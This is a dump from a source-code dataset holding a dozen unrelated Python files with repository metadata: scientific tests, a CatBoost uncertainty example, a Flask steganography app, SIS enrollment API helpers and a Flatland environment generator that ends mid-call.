# The MIT License (MIT) # Copyright (c) 2021 Tom J. Sun # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import machine from pmu import axp192 from context import Context from login import Login from home import Home import settings pmu = axp192() # Enable power management so that if power button is held down 6 secs, # it shuts off as expected pmu.enablePMICSleepMode(True) ctx = Context() ctx.display.flash_text(settings.load('splash', ( 'Krux' ), strip=False)) while True: if not Login(ctx).run(): break if not Home(ctx).run(): break ctx.display.flash_text(( 'Shutting down..' )) ctx.clear() pmu.setEnterSleepMode() machine.reset()
32.211538
79
0.755224
0
0
0
0
0
0
0
0
1,217
0.726567
fe224e1ffb01067a1145784abb7281fb2243b190
1,788
py
Python
smartfields/processors/video.py
suhaibroomy/django-smartfields
e9331dc74f72d0254608526f8816aa4bb8f1fca4
[ "MIT" ]
null
null
null
smartfields/processors/video.py
suhaibroomy/django-smartfields
e9331dc74f72d0254608526f8816aa4bb8f1fca4
[ "MIT" ]
null
null
null
smartfields/processors/video.py
suhaibroomy/django-smartfields
e9331dc74f72d0254608526f8816aa4bb8f1fca4
[ "MIT" ]
null
null
null
import re import six from smartfields.processors.base import ExternalFileProcessor from smartfields.utils import ProcessingError __all__ = [ 'FFMPEGProcessor' ] class FFMPEGProcessor(ExternalFileProcessor): duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)') progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)') error_re = re.compile(r'Invalid data found when processing input') cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \ "-maxrate {maxrate} -bufsize {bufsize} -vf " \ "scale={width}:{height} -threads {threads} -c:a {acodec} {output}" def stdout_handler(self, line, duration=None): if duration is None: duration_time = self.duration_re.search(line) if duration_time: duration = self.timedict_to_seconds(duration_time.groupdict()) elif duration != 0: current_time = self.progress_re.search(line) if current_time: seconds = self.timedict_to_seconds(current_time.groupdict()) progress = float(seconds)/duration progress = progress if progress < 1 else 0.99 self.set_progress(progress) elif self.error_re.search(line): raise ProcessingError("Invalid video file or unknown video format.") return (duration,) def timedict_to_seconds(self, timedict): seconds = 0 for key, t in six.iteritems(timedict): if key == 'seconds': seconds+= int(t) elif key == 'minutes': seconds+= int(t)*60 elif key == 'hours': seconds+= int(t)*3600 return seconds
39.733333
91
0.599553
1,619
0.905481
0
0
0
0
0
0
414
0.231544
fe22b8aac4f7560fc1450a1ab43865faaf7aecdc
2,192
py
Python
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
ramtingh/vmtk
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
[ "Apache-2.0" ]
null
null
null
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
ramtingh/vmtk
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
[ "Apache-2.0" ]
null
null
null
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
ramtingh/vmtk
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
[ "Apache-2.0" ]
1
2019-06-18T23:41:11.000Z
2019-06-18T23:41:11.000Z
## Program: VMTK ## Language: Python ## Date: January 12, 2018 ## Version: 1.4 ## Copyright (c) Richard Izzo, Luca Antiga, All rights reserved. ## See LICENSE file for details. ## This software is distributed WITHOUT ANY WARRANTY; without even ## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR ## PURPOSE. See the above copyright notices for more information. ## Note: this code was contributed by ## Richard Izzo (Github @rlizzo) ## University at Buffalo import pytest import vmtk.vmtksurfaceconnectivity as connectivity import os @pytest.fixture(scope='module') def aorta_surface_two_segments(input_datadir): import vmtk.vmtksurfacereader as surfacereader reader = surfacereader.vmtkSurfaceReader() reader.InputFileName = os.path.join(input_datadir, 'aorta-surface-two-segments.vtp') reader.Execute() return reader.Surface def test_extract_largest_surface(aorta_surface_two_segments, compare_surfaces): name = __name__ + '_test_extract_largest_surface.vtp' connectiv = connectivity.vmtkSurfaceConnectivity() connectiv.Surface = aorta_surface_two_segments connectiv.Method = 'largest' connectiv.CleanOutput = 1 connectiv.Execute() assert compare_surfaces(connectiv.Surface, name) == True def test_extract_closest_to_reference_surface(aorta_surface_two_segments, aorta_surface_reference, compare_surfaces): name = __name__ + '_test_extract_closest_to_reference_surface.vtp' connectiv = connectivity.vmtkSurfaceConnectivity() connectiv.Surface = aorta_surface_two_segments connectiv.Method = 'closest' connectiv.ReferenceSurface = aorta_surface_reference connectiv.Execute() assert compare_surfaces(connectiv.Surface, name) == True def test_extract_closest_to_point(aorta_surface_two_segments, compare_surfaces): name = __name__ + '_test_extract_closest_to_point.vtp' connectiv = connectivity.vmtkSurfaceConnectivity() connectiv.Surface = aorta_surface_two_segments connectiv.Method = 'closest' connectiv.ClosestPoint = [0.0, 0.0, 0.0] connectiv.Execute() assert compare_surfaces(connectiv.Surface, name) == True
35.354839
117
0.764599
0
0
0
0
312
0.142336
0
0
691
0.315237
fe23546882c9babc55f9bce0abdfba0776ff09c5
653
py
Python
sssoon/forms.py
Kingpin-Apps/django-sssoon
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
[ "BSD-3-Clause" ]
2
2018-04-20T08:28:10.000Z
2018-05-04T15:32:30.000Z
sssoon/forms.py
KINGH242/django-sssoon
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
[ "BSD-3-Clause" ]
2
2018-05-16T13:45:14.000Z
2020-07-29T22:01:37.000Z
sssoon/forms.py
Kingpin-Apps/django-sssoon
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
[ "BSD-3-Clause" ]
null
null
null
from django import forms from nocaptcha_recaptcha.fields import NoReCaptchaField class NewsletterForm(forms.Form): email = forms.EmailField(label='Email', required=True, widget=forms.TextInput(attrs={ 'id': 'newsletter-email', 'type': 'email', 'title': 'Email', 'name': 'email', 'class': 'form-control transparent', 'placeholder': '[email protected]' })) captcha = NoReCaptchaField()
40.8125
70
0.444104
570
0.872894
0
0
0
0
0
0
137
0.209801
fe242c827a7e391a419864c9504b7e2daf4968d1
1,054
py
Python
simple_run_menu.py
william01110111/simple_run_menu
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
[ "MIT" ]
null
null
null
simple_run_menu.py
william01110111/simple_run_menu
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
[ "MIT" ]
null
null
null
simple_run_menu.py
william01110111/simple_run_menu
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
[ "MIT" ]
null
null
null
#! /bin/python3 # simple run menu import os import stat def is_file_executable(path): executable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH if not os.path.isfile(path): return False st = os.stat(path) mode = st.st_mode if not mode & executable: return False return True def get_files_in_dir(directory): if directory == '': directory = '.' if directory[-1] != '/': directory += '/' return [directory + i for i in os.listdir(directory)] def command_to_name(command): filename_with_ext = os.path.basename(command) filename = filename_with_ext.rsplit('.', 1)[0] name = filename.replace('_', ' ') capitalized = ' '.join([i[0].upper() + i[1:] for i in name.split()]) return capitalized class Option: options = {} @staticmethod def add(command): options['a'] = Option(command, command, 'a') def __init__(self, name, command, trigger): self.name = name self.command = command self.trigger = trigger if __name__ == "__main__": print([command_to_name(i) for i in get_files_in_dir('') if is_file_executable(i)])
22.425532
83
0.685009
228
0.216319
0
0
79
0.074953
0
0
73
0.06926
fe2476b1a28089e744d395040c690305385ddcb6
1,792
py
Python
mne/io/cnt/tests/test_cnt.py
stevemats/mne-python
47051833f21bb372d60afc3adbf4305648ac7f69
[ "BSD-3-Clause" ]
1,953
2015-01-17T20:33:46.000Z
2022-03-30T04:36:34.000Z
mne/io/cnt/tests/test_cnt.py
LiFeng-SECUC/mne-python
732bb1f994e64e41a8e95dcc10dc98c22cac95c0
[ "BSD-3-Clause" ]
8,490
2015-01-01T13:04:18.000Z
2022-03-31T23:02:08.000Z
mne/io/cnt/tests/test_cnt.py
LiFeng-SECUC/mne-python
732bb1f994e64e41a8e95dcc10dc98c22cac95c0
[ "BSD-3-Clause" ]
1,130
2015-01-08T22:39:27.000Z
2022-03-30T21:44:26.000Z
# Author: Jaakko Leppakangas <[email protected]> # Joan Massich <[email protected]> # # License: BSD-3-Clause import os.path as op import numpy as np from numpy.testing import assert_array_equal import pytest from mne import pick_types from mne.datasets import testing from mne.io.tests.test_raw import _test_raw_reader from mne.io.cnt import read_raw_cnt from mne.annotations import read_annotations data_path = testing.data_path(download=False) fname = op.join(data_path, 'CNT', 'scan41_short.cnt') @testing.requires_testing_data def test_data(): """Test reading raw cnt files.""" with pytest.warns(RuntimeWarning, match='number of bytes'): raw = _test_raw_reader(read_raw_cnt, input_fname=fname, eog='auto', misc=['NA1', 'LEFT_EAR']) # make sure we use annotations event if we synthesized stim assert len(raw.annotations) == 6 eog_chs = pick_types(raw.info, eog=True, exclude=[]) assert len(eog_chs) == 2 # test eog='auto' assert raw.info['bads'] == ['LEFT_EAR', 'VEOGR'] # test bads # the data has "05/10/200 17:35:31" so it is set to None assert raw.info['meas_date'] is None @testing.requires_testing_data def test_compare_events_and_annotations(): """Test comparing annotations and events.""" with pytest.warns(RuntimeWarning, match='Could not parse meas date'): raw = read_raw_cnt(fname) events = np.array([[333, 0, 7], [1010, 0, 7], [1664, 0, 109], [2324, 0, 7], [2984, 0, 109]]) annot = read_annotations(fname) assert len(annot) == 6 assert_array_equal(annot.onset[:-1], events[:, 0] / raw.info['sfreq']) assert 'STI 014' not in raw.info['ch_names']
32
74
0.65346
0
0
0
0
1,266
0.706473
0
0
488
0.272321
fe24a27fb5e1b1af1324c59e811661bad02c4101
792
py
Python
parliament_proposal_fetcher.py
Track-your-parliament/track-your-parliament-data
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
[ "MIT" ]
null
null
null
parliament_proposal_fetcher.py
Track-your-parliament/track-your-parliament-data
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
[ "MIT" ]
null
null
null
parliament_proposal_fetcher.py
Track-your-parliament/track-your-parliament-data
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
[ "MIT" ]
null
null
null
import urllib.request, json import pandas as pd baseUrl = 'https://avoindata.eduskunta.fi/api/v1/tables/VaskiData' parameters = 'rows?columnName=Eduskuntatunnus&columnValue=LA%25&perPage=100' page = 0 df = '' while True: print(f'Fetching page number {page}') with urllib.request.urlopen(f'{baseUrl}/{parameters}&page={page}') as url: data = json.loads(url.read().decode()) if page == 0: columns = data['columnNames'] df = pd.DataFrame(columns=columns) dataRows = data['rowData'] df = df.append(pd.DataFrame(dataRows, columns=data['columnNames']), ignore_index=True) if data['hasMore'] == False: break page = page + 1 df.to_csv('./data/parliament_proposals_raw.csv', sep=';', encoding='utf-8')
29.333333
94
0.641414
0
0
0
0
0
0
0
0
279
0.352273
fe2717913fd1b6cb1c949e299c54e281bc41335e
2,899
py
Python
examples/Catboost_regression-scorer_usage.py
emaldonadocruz/UTuning
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
[ "BSD-3-Clause" ]
null
null
null
examples/Catboost_regression-scorer_usage.py
emaldonadocruz/UTuning
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
[ "BSD-3-Clause" ]
null
null
null
examples/Catboost_regression-scorer_usage.py
emaldonadocruz/UTuning
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Mon Sep 20 16:15:37 2021 @author: em42363 """ # In[1]: Import functions ''' CatBoost is a high-performance open source library for gradient boosting on decision trees ''' from catboost import CatBoostRegressor from sklearn.model_selection import train_test_split import pandas as pd import seaborn as sns import numpy as np import os os.chdir(os.path.dirname(__file__)) import sys sys.path.insert(0, r'C:\Users\eduar\OneDrive\PhD\UTuning') sys.path.insert(0, r'C:\Users\em42363\OneDrive\PhD\UTuning') from UTuning import scorer, plots #df = pd.read_csv(r'C:\Users\eduar\OneDrive\PhD\UTuning\dataset\unconv_MV.csv') df = pd.read_csv(r'C:\Users\em42363\OneDrive\PhD\UTuning\dataset\unconv_MV.csv') import random import matplotlib.pyplot as plt # In[1]: Split train test ''' Perform split train test ''' y = df['Production'].values X = df[['Por', 'LogPerm', 'Brittle', 'TOC']].values X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33) # In[6]: Regressor ''' Define the regressor, fit the model and predict the estimates ''' model = CatBoostRegressor(iterations=1000, learning_rate=0.2, loss_function='RMSEWithUncertainty', verbose=False, random_seed=0) model.fit(X_train, y_train) estimates = model.predict(X_test) # In[9]: Plot error line ''' Use UTuning to plot error lines ''' plots.error_line(estimates[:, 0], y_test, np.sqrt(estimates[:, 1]), Frac=1) # %% Define the virtual ensemble def virt_ensemble(X_train,y_train, num_samples=100, iters=1000, lr=0.1): # 100, .1 ens_preds = [] model = CatBoostRegressor(iterations=iters, learning_rate=lr, loss_function='RMSEWithUncertainty', verbose=False, random_seed=1) model.fit(X_train,y_train) ens_preds = model.virtual_ensembles_predict(X_test, prediction_type='VirtEnsembles', virtual_ensembles_count=num_samples, thread_count=8) return np.asarray(ens_preds) # %% n_quantiles = 11 perc = np.linspace(0.0, 1.00, n_quantiles) Samples = 10 ens_preds=virt_ensemble(X_train,y_train, num_samples=Samples) Pred_array = ens_preds[:,:,0] Knowledge_u=np.sqrt(np.var(Pred_array,axis=1)) #Knowledge uncertainty Data_u=np.sqrt(np.mean(ens_preds[:,:,1],axis=1)) #Data uncertainty Sigma=Knowledge_u+Data_u # %% ''' We use UTuning to return the Indicator Function and plot the accuracy plot and diagnose our model. ''' scorer = scorer.scorer(Pred_array, y_test, Sigma) IF_array = scorer.IndicatorFunction() avgIF = np.mean(IF_array,axis=0) # % Second plot test plots.error_accuracy_plot(perc,IF_array,Pred_array,y_test,Sigma) # % print('Accuracy = {0:2.2f}'.format(scorer.Accuracy())) print('Precision = {0:2.2f}'.format(scorer.Precision())) print('Goodness = {0:2.2f}'.format(scorer.Goodness()))
26.354545
102
0.703001
0
0
0
0
0
0
0
0
1,011
0.348741
fe27a69a39058bf33d488a199887b8c07ffdf22c
1,683
py
Python
sujson/_logger.py
PotasnikM/translator-to-suJSON
abb2001c78d431bd2087754666bc896ba0543dfd
[ "MIT" ]
2
2019-07-01T12:45:25.000Z
2020-06-23T11:48:08.000Z
sujson/_logger.py
PotasnikM/translator-to-suJSON
abb2001c78d431bd2087754666bc896ba0543dfd
[ "MIT" ]
17
2019-04-25T10:46:40.000Z
2020-11-10T09:28:55.000Z
sujson/_logger.py
PotasnikM/translator-to-suJSON
abb2001c78d431bd2087754666bc896ba0543dfd
[ "MIT" ]
3
2019-06-22T19:51:08.000Z
2021-02-08T09:17:55.000Z
import logging from platform import system from tqdm import tqdm from multiprocessing import Lock loggers = {} # https://stackoverflow.com/questions/38543506/ class TqdmLoggingHandler(logging.Handler): def __init__(self, level=logging.NOTSET): super(TqdmLoggingHandler, self).__init__(level) def emit(self, record): try: msg = self.format(record) tqdm.set_lock(Lock()) tqdm.write(msg) self.flush() except (KeyboardInterrupt, SystemExit): raise except: self.handleError(record) def setup_custom_logger(name): """ Create a logger with a certain name and level """ global loggers if loggers.get(name): return loggers.get(name) formatter = logging.Formatter( fmt='%(levelname)s: %(message)s' ) handler = TqdmLoggingHandler() handler.setFormatter(formatter) if system() not in ['Windows', 'cli']: logging.addLevelName(logging.ERROR, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.ERROR)) logging.addLevelName(logging.WARNING, "\033[1;33m%s\033[1;0m" % logging.getLevelName(logging.WARNING)) logging.addLevelName(logging.INFO, "\033[1;34m%s\033[1;0m" % logging.getLevelName(logging.INFO)) logging.addLevelName(logging.DEBUG, "\033[1;35m%s\033[1;0m" % logging.getLevelName(logging.DEBUG)) logger = logging.getLogger(name) logger.setLevel(logging.WARNING) # if (logger.hasHandlers()): # logger.handlers.clear() if logger.handlers: logger.handlers = [] logger.addHandler(handler) loggers.update(dict(name=logger)) return logger
29.017241
110
0.655971
430
0.255496
0
0
0
0
0
0
299
0.177659
fe27abc65b6073ec58be633f81761077a129a312
1,243
py
Python
face-detect.py
Gicehajunior/face-recognition-detection-OpenCv-Python
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
[ "Unlicense" ]
null
null
null
face-detect.py
Gicehajunior/face-recognition-detection-OpenCv-Python
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
[ "Unlicense" ]
null
null
null
face-detect.py
Gicehajunior/face-recognition-detection-OpenCv-Python
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
[ "Unlicense" ]
null
null
null
import cv2 import sys import playsound face_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_default.xml') # capture video using cv2 video_capture = cv2.VideoCapture(0) while True: # capture frame by frame, i.e, one by one ret, frame = video_capture.read() gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # for each face on the projected on the frame faces = face_cascade.detectMultiScale( gray, scaleFactor = 1.1, minNeighbors = 5, # minSize(35, 35) ) # loop through the video faces for detection for (x, y, w, h) in faces: point1 = x+w point2 = y+h frame_color = (50, 50, 200) rectangleBox = cv2.rectangle(frame, (x, y), (point1, point2), frame_color, 2) cv2.imshow('video', frame) if faces.any(): playsound.playsound('openDoorAlert.mp3', True) if len(faces) > 1: print("There are " + str(len(faces)) + " peoples at the gate") else: print("There is " + str(len(faces)) + " person at the gate") else: pass if cv2.waitKey(1) & 0xFF == ord('q'): sys.exit()
28.25
85
0.563154
0
0
0
0
0
0
0
0
314
0.252615
fe27fecf1f48f5d4699cad091ca66149a513fe9b
7,938
py
Python
sis/enrollments.py
ryanlovett/sis-cli
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
[ "Apache-2.0" ]
null
null
null
sis/enrollments.py
ryanlovett/sis-cli
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
[ "Apache-2.0" ]
null
null
null
sis/enrollments.py
ryanlovett/sis-cli
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
[ "Apache-2.0" ]
null
null
null
# vim:set et sw=4 ts=4: import logging import sys import jmespath from . import sis, classes # logging logging.basicConfig(stream=sys.stdout, level=logging.WARNING) logger = logging.getLogger(__name__) # SIS endpoint enrollments_uri = "https://apis.berkeley.edu/sis/v2/enrollments" # apparently some courses have LAB without LEC (?) section_codes = ['LEC', 'SES', 'WBL'] async def get_student_enrollments(app_id, app_key, identifier, term_id, id_type='campus-uid', enrolled_only='true', primary_only='true', course_attr='course-id'): '''Gets a students enrollments.''' uri = enrollments_uri + f"/students/{identifier}" headers = { "Accept": "application/json", "app_id": app_id, "app_key": app_key } params = { "page-number": 1, "page-size": 100, # maximum "id-type": id_type, "term-id": term_id, "enrolled-only": enrolled_only, "primary-only": primary_only, } enrollments = await sis.get_items(uri, params, headers, 'studentEnrollments') logger.debug(f"enrollments: {enrollments}") if course_attr == 'course-id': flt = '[].classSection.class.course.identifiers[?type == `cs-course-id`].id[]' elif course_attr == 'display-name': flt = '[].classSection.class.course.displayName' return jmespath.search(flt, enrollments) async def get_section_enrollments(app_id, app_key, term_id, section_id): '''Gets a course section's enrollments.''' uri = enrollments_uri + f"/terms/{term_id}/classes/sections/{section_id}" headers = { "Accept": "application/json", "app_id": app_id, "app_key": app_key } params = { "page-number": 1, "page-size": 100, # maximum } enrollments = await sis.get_items(uri, params, headers, 'classSectionEnrollments') logger.info(f"{section_id}: {len(enrollments)}") return enrollments def section_id(section): '''Return a section's course ID, e.g. "15807".''' return section['id'] def section_subject_area(section): '''Return a section's subject area, e.g. "STAT".''' return jmespath.search('class.course.subjectArea.code', section) def section_catalog_number(section): '''Return a section's formatted catalog number, e.g. "215B".''' return jmespath.search('class.course.catalogNumber.formatted', section) def section_display_name(section): '''Return a section's displayName, e.g. "STAT 215B".''' return jmespath.search('class.course.displayName', section) def section_is_primary(section): '''Return a section's primary status.''' return jmespath.search('association.primary', section) def enrollment_campus_uid(enrollment): '''Return an enrollent's campus UID.''' expr = "student.identifiers[?disclose && type=='campus-uid'].id | [0]" return jmespath.search(expr, enrollment) def enrollment_campus_email(enrollment): '''Return an enrollment's campus email if found, otherwise return any other email.''' expr = "student.emails[?type.code=='CAMP'].emailAddress | [0]" email = jmespath.search(expr, enrollment) if email: return email expr = "student.emails[?type.code=='OTHR'].emailAddress | [0]" return jmespath.search(expr, enrollment) def get_enrollment_uids(enrollments): '''Given an SIS enrollment, return the student's campus UID.''' return list(map(lambda x: enrollment_campus_uid(x), enrollments)) def get_enrollment_emails(enrollments): '''Given an SIS enrollment, return the student's campus email.''' return list(map(lambda x: enrollment_campus_email(x), enrollments)) def enrollment_status(enrollment): '''Return an enrollment's status, e.g. 'E', 'W', or 'D'.''' return jmespath.search('enrollmentStatus.status.code', enrollment) def filter_enrollment_status(enrollments, status): return list(filter(lambda x: enrollment_status(x) == status, enrollments)) def status_code(constituents): return {'enrolled':'E', 'waitlisted':'W', 'dropped':'D'}[constituents] async def get_students(term_id, class_number, constituents, credentials, exact, identifier='campus-uid'): '''Given a term and class section number, return the student ids.''' if exact: # get all enrollments for this section enrollments = await get_section_enrollments( credentials['enrollments_id'], credentials['enrollments_key'], term_id, class_number ) else: # get the data for the specified section section = await classes.get_sections_by_id( credentials['classes_id'], credentials['classes_key'], term_id, class_number, include_secondary='true' ) # extract the subject area and catalog number, e.g. STAT C8 subject_area = section_subject_area(section) catalog_number = section_catalog_number(section) logger.info(f"{subject_area} {catalog_number}") # get enrollments in all matching sections enrollments = await get_enrollments( credentials['enrollments_id'], credentials['enrollments_key'], term_id, subject_area, catalog_number ) if constituents == 'students': constituent_enrollments = enrollments else: # filter for those enrollments with a specific status code constituent_enrollments = filter_enrollment_status( enrollments, status_code(constituents)) # function to extract an enrollment attribute if identifier == 'campus-uid': enrollment_attr_fn = enrollment_campus_uid else: enrollment_attr_fn = enrollment_campus_email logger.debug(f"constituent_enrollments: {constituent_enrollments}") # we convert to a set to collapse overlapping enrollments between # lectures and labs (if not exact) return set(map(lambda x: enrollment_attr_fn(x), constituent_enrollments)) def filter_lectures(sections, relevant_codes=section_codes): ''' Given a list of SIS sections: [{'code': '32227', 'description': '2019 Spring ASTRON 128 001 LAB 001'}] return only the section codes which are lectures. ''' codes = [] for section in sections: if 'description' not in section: continue desc_words = set(section['description'].split()) if len(set(desc_words) & set(relevant_codes)) > 0: codes.append(section['code']) return codes async def get_lecture_section_ids(app_id, app_key, term_id, subject_area, catalog_number=None): ''' Given a term, subject, and course number, return the lecture section ids. We only care about the lecture enrollments since they contain a superset of the enrollments of all other section types (lab, dis). ''' uri = enrollments_uri + f'/terms/{term_id}/classes/sections/descriptors' headers = { "Accept": "application/json", "app_id": app_id, "app_key": app_key } params = { 'page-number': 1, "subject-area-code": subject_area } if catalog_number: params["catalog-number"] = catalog_number # Retrieve the sections associated with the course which includes # both lecture and sections. sections = await sis.get_items(uri, params, headers, 'fieldValues') return filter_lectures(sections) async def get_enrollments(app_id, app_key, term_id, subject_area, catalog_number): '''Gets a course's enrollments from the SIS.''' logger.info(f"get_enrollments: {subject_area} {catalog_number}") # get the lectures lecture_codes = await get_lecture_section_ids(app_id, app_key, term_id, subject_area, catalog_number) # get the enrollments in each lecture enrollments = [] for section_id in lecture_codes: enrollments += await get_section_enrollments(app_id, app_key, term_id, section_id) logger.info(f'enrollments: {len(enrollments)}') return enrollments
37.620853
105
0.68317
0
0
0
0
0
0
4,927
0.620685
3,272
0.412195
fe2900b93b3b942d3363b1695eb5a7b3920a90d6
1,913
py
Python
app.py
Nishanth-Gobi/Da-Vinci-Code
b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a
[ "MIT" ]
null
null
null
app.py
Nishanth-Gobi/Da-Vinci-Code
b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a
[ "MIT" ]
null
null
null
app.py
Nishanth-Gobi/Da-Vinci-Code
b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a
[ "MIT" ]
null
null
null
from flask import Flask, render_template, request, redirect, url_for from os.path import join from stego import Steganography app = Flask(__name__) UPLOAD_FOLDER = 'static/files/' app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'} @app.route("/") def home(): return render_template('home.html') @app.route("/encrypt", methods=['GET', 'POST']) def get_image(): if request.method == 'GET': return render_template('encrypt.html') # Check if the user has entered the secret message if 'file' in request.files and 'Secret' in request.values: uploaded_image = request.files['file'] message = request.values.get('Secret') password = request.values.get("key") filepath = join(app.config['UPLOAD_FOLDER'], "cover_image.png") uploaded_image.save(filepath) im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password) im.encode(message=message) return render_template('encrypt.html', value=filepath, image_flag=True, secret_flag=True) return redirect(url_for('encrypt')) @app.route("/decrypt", methods=['GET', 'POST']) def get_image_to_decrypt(): if request.method == 'GET': return render_template('decrypt.html') if 'key' in request.values: password = request.values.get('key') filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png") im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password) message = im.decode() return render_template('decrypt.html', value=filepath, message=message) if 'file' in request.files: uploaded_image = request.files['file'] filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png") uploaded_image.save(filepath) return render_template('decrypt.html', value=filepath) if __name__ == '__main__': app.run(debug=True)
31.360656
97
0.67747
0
0
0
0
1,581
0.826451
0
0
432
0.225823
fe292b4982f3dd8af18a6b88ccaadbbba6d158ef
8,012
py
Python
imitation_learning/generate_demonstrations/gen_envs.py
HaiDangDang/2020-flatland
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
[ "MIT" ]
1
2021-02-21T02:54:35.000Z
2021-02-21T02:54:35.000Z
imitation_learning/generate_demonstrations/gen_envs.py
HaiDangDang/2020-flatland
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
[ "MIT" ]
null
null
null
imitation_learning/generate_demonstrations/gen_envs.py
HaiDangDang/2020-flatland
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
[ "MIT" ]
null
null
null
from flatland.envs.agent_utils import RailAgentStatus from flatland.envs.malfunction_generators import malfunction_from_params, MalfunctionParameters from flatland.envs.observations import GlobalObsForRailEnv from flatland.envs.rail_env import RailEnv from flatland.envs.rail_generators import sparse_rail_generator from flatland.envs.schedule_generators import sparse_schedule_generator from flatland.utils.rendertools import RenderTool import random import sys import os import time import msgpack import json from PIL import Image import argparse as ap def RandomTestParams(tid): seed = tid * 19997 + 997 random.seed(seed) width = 50 + random.randint(0, 100) height = 50 + random.randint(0, 100) nr_cities = 4 + random.randint(0, (width + height) // 10) nr_trains = min(nr_cities * 20, 100 + random.randint(0, 100)) max_rails_between_cities = 2 max_rails_in_cities = 3 + random.randint(0, 5) malfunction_rate = 30 + random.randint(0, 100) malfunction_min_duration = 3 + random.randint(0, 7) malfunction_max_duration = 20 + random.randint(0, 80) return ( seed, width, height, nr_trains, nr_cities, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration ) def RandomTestParams_small(tid): seed = tid * 19997 + 997 random.seed(seed) nSize = random.randint(0,5) width = 20 + nSize * 5 height = 20 + nSize * 5 nr_cities = 2 + nSize // 2 + random.randint(0,2) nr_trains = min(nr_cities * 5, 5 + random.randint(0,5)) #, 10 + random.randint(0, 10)) max_rails_between_cities = 2 max_rails_in_cities = 3 + random.randint(0, nSize) malfunction_rate = 30 + random.randint(0, 100) malfunction_min_duration = 3 + random.randint(0, 7) malfunction_max_duration = 20 + random.randint(0, 80) return ( seed, width, height, nr_trains, nr_cities, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration ) def ShouldRunTest(tid): return tid >= 7 #return tid >= 3 return True def create_test_env(fnParams, nTest, sDir): (seed, width, height, nr_trains, nr_cities, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration) = fnParams(nTest) #if not ShouldRunTest(test_id): # continue rail_generator = sparse_rail_generator( max_num_cities=nr_cities, seed=seed, grid_mode=False, max_rails_between_cities=max_rails_between_cities, max_rails_in_city=max_rails_in_cities, ) #stochastic_data = {'malfunction_rate': malfunction_rate, # 'min_duration': malfunction_min_duration, # 'max_duration': malfunction_max_duration # } stochastic_data = MalfunctionParameters(malfunction_rate=malfunction_rate, min_duration=malfunction_min_duration, max_duration=malfunction_max_duration ) observation_builder = GlobalObsForRailEnv() DEFAULT_SPEED_RATIO_MAP = { 1.: 0.25, 1. / 2.: 0.25, 1. / 3.: 0.25, 1. / 4.: 0.25} schedule_generator = sparse_schedule_generator(DEFAULT_SPEED_RATIO_MAP) for iAttempt in range(5): try: env = RailEnv( width=width, height=height, rail_generator=rail_generator, schedule_generator=schedule_generator, number_of_agents=nr_trains, malfunction_generator_and_process_data=malfunction_from_params(stochastic_data), obs_builder_object=observation_builder, 